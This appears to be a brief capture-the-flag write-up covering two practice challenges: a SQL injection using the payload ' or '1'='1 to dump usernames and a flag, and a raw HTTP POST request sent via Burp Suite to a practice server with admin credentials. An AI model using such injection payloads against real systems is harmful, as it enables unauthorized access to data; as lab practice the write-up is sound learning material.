===============
Basic Injection
===============
This payload showed me the user names and the flag >
' or '1'='1

============
POST Practice
============
Solved by sending post request using burpsuite > 
POST /post.php HTTP/1.1
Host: 165.227.106.113
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded

username=admin&password=71urlkufpsdnlkadsf
